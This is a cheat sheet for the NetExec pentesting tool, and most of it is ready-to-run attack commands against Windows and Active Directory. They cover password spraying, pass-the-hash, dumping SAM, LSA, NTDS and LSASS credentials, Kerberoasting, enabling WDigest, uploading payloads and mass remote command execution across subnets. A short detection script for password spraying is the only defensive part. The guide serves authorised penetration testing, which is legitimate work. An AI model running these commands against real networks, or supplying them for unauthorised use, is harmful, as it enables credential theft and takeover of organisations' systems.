Overview

NetExec (nxc) is the successor to CrackMapExec (cme): a multi-protocol Swiss army knife for pentesting Windows/Active Directory environments. It supports SMB, LDAP, WinRM, MSSQL, SSH, FTP, and RDP from a single tool with a unified interface.
  • CrackMapExec is deprecated — use nxc instead of crackmapexec/cme
  • Handles password spraying, credential validation, command execution, and post-exploitation across protocols
  • Built-in database tracks all discovered credentials and hosts

Installation

pipx install git+https://github.com/Pennyw0rth/NetExec

apt (Kali)

sudo apt install netexec

From source

git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pipx install .
Verify:
nxc --version

Authentication Methods

All protocols share the same authentication flags.
# Password
nxc smb <IP> -u user -p 'Password123'

# NTLM hash (Pass-the-Hash)
nxc smb <IP> -u user -H 'aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76'

# NTLM hash (NT only)
nxc smb <IP> -u user -H '5fbc3d5fec8206a30f4b6c473d68ae76'

# Kerberos ticket (ccache)
export KRB5CCNAME=/tmp/user.ccache
nxc smb <IP> -u user --use-kcache

# Kerberos with password (request TGT)
nxc smb <IP> -u user -p 'Password123' -k

# NULL session
nxc smb <IP> -u '' -p ''

# Guest session
nxc smb <IP> -u 'guest' -p ''

# Domain authentication
nxc smb <IP> -u user -p 'Password123' -d DOMAIN.LOCAL

# Local authentication
nxc smb <IP> -u user -p 'Password123' --local-auth

# Credential files
nxc smb <IP> -u users.txt -p passwords.txt
nxc smb <IP> -u users.txt -p passwords.txt --continue-on-success

SMB

Check Access and Signing

# Check if user is admin
nxc smb <IP> -u user -p 'Password123'
# Output shows (Pwn3d!) if admin

# List hosts that do not require SMB signing (written to unsigned.txt)
nxc smb <IP> --gen-relay-list unsigned.txt

# Enumerate hosts on a subnet
nxc smb 10.10.10.0/24

Enumerate Shares

nxc smb <IP> -u user -p 'Password123' --shares

Spider Shares

nxc smb <IP> -u user -p 'Password123' -M spider_plus

# Spider and download the files found (without DOWNLOAD_FLAG, spider_plus only writes JSON metadata)
nxc smb <IP> -u user -p 'Password123' -M spider_plus -o DOWNLOAD_FLAG=true

List Users

nxc smb <IP> -u user -p 'Password123' --users

Enumerate Logged-On Users

nxc smb <IP> -u user -p 'Password123' --loggedon-users

Enumerate Disks

nxc smb <IP> -u user -p 'Password123' --disks

RID Brute Force

nxc smb <IP> -u user -p 'Password123' --rid-brute
nxc smb <IP> -u user -p 'Password123' --rid-brute 10000

# With NULL session
nxc smb <IP> -u '' -p '' --rid-brute

Pass-the-Hash

nxc smb <IP> -u user -H 'NTLM_HASH'
nxc smb 10.10.10.0/24 -u administrator -H 'NTLM_HASH'

SAM Dump

nxc smb <IP> -u user -p 'Password123' --sam

LSA Dump

nxc smb <IP> -u user -p 'Password123' --lsa

NTDS Dump (Domain Controller)

# Full NTDS dump
nxc smb <DC_IP> -u user -p 'Password123' --ntds

# Using VSS method
nxc smb <DC_IP> -u user -p 'Password123' --ntds vss

# Filter specific user
nxc smb <DC_IP> -u user -p 'Password123' --ntds --user targetuser

Command Execution

# CMD execution
nxc smb <IP> -u user -p 'Password123' -x 'whoami'

# PowerShell execution
nxc smb <IP> -u user -p 'Password123' -X 'Get-Process'

# Choose exec method
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method smbexec
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method mmcexec
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method atexec
nxc smb <IP> -u user -p 'Password123' -x 'whoami' --exec-method wmiexec

Put / Get Files

nxc smb <IP> -u user -p 'Password123' --put-file /tmp/payload.exe '\\Windows\\Temp\\payload.exe'
nxc smb <IP> -u user -p 'Password123' --get-file '\\Windows\\Temp\\secret.txt' /tmp/secret.txt

LDAP

Enumerate Users

nxc ldap <DC_IP> -u user -p 'Password123' --users

Enumerate Groups

nxc ldap <DC_IP> -u user -p 'Password123' --groups

Enumerate Computers

nxc ldap <DC_IP> -u user -p 'Password123' --computers

Enumerate Domain Trusts

--trusted-for-delegation lists unconstrained-delegation accounts, not trusts (see “Find Delegation” below). NetExec has no dedicated trust flag — collect trusts via BloodHound:
nxc ldap <DC_IP> -u user -p 'Password123' --bloodhound -c Trusts --dns-server <DC_IP>

Password Hunting (Description Field)

nxc ldap <DC_IP> -u user -p 'Password123' -M get-desc-users

Kerberoastable Users

nxc ldap <DC_IP> -u user -p 'Password123' --kerberoasting output.txt

AS-REP Roastable Users

nxc ldap <DC_IP> -u user -p 'Password123' --asreproast output.txt

Find Delegation

nxc ldap <DC_IP> -u user -p 'Password123' --trusted-for-delegation

MachineAccountQuota (MAQ)

nxc ldap <DC_IP> -u user -p 'Password123' -M maq

Password Policy

nxc smb <DC_IP> -u user -p 'Password123' --pass-pol

LAPS Passwords

nxc ldap <DC_IP> -u user -p 'Password123' -M laps

gMSA Passwords

nxc ldap <DC_IP> -u user -p 'Password123' --gmsa

Enumerate ADCS

nxc ldap <DC_IP> -u user -p 'Password123' -M adcs

WinRM

Check Access

nxc winrm <IP> -u user -p 'Password123'
# Output shows (Pwn3d!) if user can execute commands

Command Execution

# CMD
nxc winrm <IP> -u user -p 'Password123' -x 'whoami'

# PowerShell
nxc winrm <IP> -u user -p 'Password123' -X 'Get-Process'

Pass-the-Hash

nxc winrm <IP> -u user -H 'NTLM_HASH' -x 'whoami'

MSSQL

Authentication

# SQL authentication
nxc mssql <IP> -u sa -p 'Password123'

# Windows authentication
nxc mssql <IP> -u user -p 'Password123' -d DOMAIN.LOCAL

# Local Windows auth
nxc mssql <IP> -u user -p 'Password123' --local-auth

Command Execution (xp_cmdshell)

nxc mssql <IP> -u sa -p 'Password123' -x 'whoami'
nxc mssql <IP> -u sa -p 'Password123' -X 'Get-Process'

Enumeration

# Enumerate databases
nxc mssql <IP> -u sa -p 'Password123' -q 'SELECT name FROM sys.databases'

# Run arbitrary SQL
nxc mssql <IP> -u sa -p 'Password123' -q 'SELECT @@version'

SSH

Authentication Check

nxc ssh <IP> -u user -p 'Password123'

Brute Force

nxc ssh <IP> -u users.txt -p passwords.txt --continue-on-success

Command Execution

nxc ssh <IP> -u user -p 'Password123' -x 'id'

FTP

Authentication Check

nxc ftp <IP> -u user -p 'Password123'

Anonymous Check

nxc ftp <IP> -u anonymous -p ''

Brute Force

nxc ftp <IP> -u users.txt -p passwords.txt --continue-on-success

RDP

Check Access

nxc rdp <IP> -u user -p 'Password123'

Check NLA

nxc rdp <IP> -u user -p 'Password123' --nla-screenshot

Screenshot

nxc rdp <IP> -u user -p 'Password123' --screenshot

Password Spraying

Across Protocols

# SMB spray
nxc smb 10.10.10.0/24 -u users.txt -p 'Spring2024!' --continue-on-success

# LDAP spray
nxc ldap <DC_IP> -u users.txt -p 'Spring2024!' --continue-on-success

# WinRM spray
nxc winrm <IP> -u users.txt -p 'Spring2024!' --continue-on-success

# SSH spray
nxc ssh <IP> -u users.txt -p passwords.txt --continue-on-success

# Multiple passwords against multiple users
nxc smb <IP> -u users.txt -p passwords.txt --continue-on-success

Jitter and Delay

nxc smb <IP> -u users.txt -p 'Spring2024!' --jitter 3

Lockout Awareness

Always check the password policy first:
nxc smb <DC_IP> -u user -p 'Password123' --pass-pol
Then spray one password at a time with --continue-on-success and wait between attempts based on the lockout observation window.
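From the defender's side, this pacing is why per-account lockout counters alone miss a spray: the signal is one source failing against many distinct accounts. The following detection sketch is an added example, not part of the original page or of NetExec; the log format, thresholds and sample lines are constructed assumptions to be tuned to the domain's lockout observation window.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, normalized from Windows Security events as
# "timestamp,event_id,source_ip,account" (4625 = failed logon, 4624 = success).
SAMPLE_LOG = """\
2024-03-04T09:00:01,4625,10.10.10.50,alice
2024-03-04T09:00:02,4625,10.10.10.50,bob
2024-03-04T09:00:03,4624,10.10.10.50,carol
2024-03-04T09:00:04,4625,10.10.10.50,dave
2024-03-04T09:00:05,4625,10.10.10.50,erin
2024-03-04T09:00:06,4625,10.10.10.50,frank
2024-03-04T09:10:00,4625,10.10.10.77,gina
2024-03-04T09:10:20,4625,10.10.10.77,gina
2024-03-04T09:10:45,4624,10.10.10.77,gina
"""

def detect_spray(log_text, window=timedelta(minutes=30), min_accounts=5):
    """Return {source_ip: {"accounts": n, "succeeded": [...]}} for sources whose
    failed logons span >= min_accounts distinct accounts inside one window."""
    fails, wins = defaultdict(list), defaultdict(set)
    for ts, event_id, src, account in csv.reader(log_text.splitlines()):
        when = datetime.fromisoformat(ts)
        if event_id == "4625":
            fails[src].append((when, account.lower()))
        elif event_id == "4624":
            wins[src].add(account.lower())
    alerts = {}
    for src, attempts in fails.items():
        attempts.sort()
        start, widest = 0, 0
        for end, (when, _) in enumerate(attempts):
            # Slide the window start forward until it is within `window` of `when`.
            while when - attempts[start][0] > window:
                start += 1
            widest = max(widest, len({a for _, a in attempts[start:end + 1]}))
        if widest >= min_accounts:
            # A success from a flagged source marks an account to reset and review.
            alerts[src] = {"accounts": widest, "succeeded": sorted(wins[src])}
    return alerts

if __name__ == "__main__":
    for src, hit in detect_spray(SAMPLE_LOG).items():
        print(src, hit)
```

The user who mistypes a password three times (10.10.10.77) is not flagged, because the rule keys on distinct accounts per source rather than failures per account.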

Modules

List All Modules

nxc smb -L
nxc ldap -L
nxc winrm -L
nxc mssql -L

Module Info

nxc smb -M spider_plus --options

Useful Modules

# Spider shares and output JSON
nxc smb <IP> -u user -p 'Password123' -M spider_plus

# Get network connections
nxc smb <IP> -u user -p 'Password123' -M get_netconnections

# Enable WDigest (plaintext creds in memory)
nxc smb <IP> -u user -p 'Password123' -M wdigest -o ACTION=enable

# Dump LSASS with lsassy (NetExec has no mimikatz module)
nxc smb <IP> -u user -p 'Password123' -M lsassy

# Dump LSASS with nanodump
nxc smb <IP> -u user -p 'Password123' -M nanodump

# Dump LSASS with procdump
nxc smb <IP> -u user -p 'Password123' -M procdump

# Enable RDP
nxc smb <IP> -u user -p 'Password123' -M rdp -o ACTION=enable

# Check WebDAV
nxc smb <IP> -u user -p 'Password123' -M webdav

# NTDS dump via ntdsutil
nxc smb <DC_IP> -u user -p 'Password123' -M ntdsutil

# Enumerate AV products
nxc smb <IP> -u user -p 'Password123' -M enum_av

Output and Logging

Log to File

nxc smb <IP> -u user -p 'Password123' --log output.log

NetExec Database (nxcdb)

All results are automatically stored in the nxcdb SQLite database.
# Launch database interface
nxcdb

# Inside nxcdb
help
proto smb
creds
hosts

Export Results

# Export credentials to CSV (export format is simple or detailed)
nxcdb
proto smb
creds
export creds detailed /tmp/creds.csv

# Export hosts to CSV
hosts
export hosts detailed /tmp/hosts.csv

Verbose Output

nxc smb <IP> -u user -p 'Password123' --verbose

Common One-Liners

# Find all hosts where user is local admin
nxc smb 10.10.10.0/24 -u user -p 'Password123'

# Spray one password across a subnet
nxc smb 10.10.10.0/24 -u users.txt -p 'Spring2024!' --continue-on-success

# Dump all domain hashes from DC
nxc smb <DC_IP> -u admin -p 'Password123' --ntds

# Find hosts where SMB signing is not required (relay targets)
nxc smb 10.10.10.0/24 --gen-relay-list unsigned.txt

# Enumerate shares across a subnet
nxc smb 10.10.10.0/24 -u user -p 'Password123' --shares

# Extract LAPS passwords
nxc ldap <DC_IP> -u user -p 'Password123' -M laps

# Find AS-REP roastable users
nxc ldap <DC_IP> -u user -p 'Password123' --asreproast asrep.txt

# Find Kerberoastable users
nxc ldap <DC_IP> -u user -p 'Password123' --kerberoasting kerb.txt

# Check for null sessions across subnet
nxc smb 10.10.10.0/24 -u '' -p '' --shares

# Mass command execution on pwned hosts
nxc smb 10.10.10.0/24 -u admin -H 'NTLM_HASH' -x 'whoami' --exec-method smbexec

# RID brute with null session
nxc smb <DC_IP> -u '' -p '' --rid-brute 10000

# Dump SAM on all hosts where you are admin
nxc smb 10.10.10.0/24 -u admin -p 'Password123' --sam

# Spider all readable shares for sensitive files
nxc smb 10.10.10.0/24 -u user -p 'Password123' -M spider_plus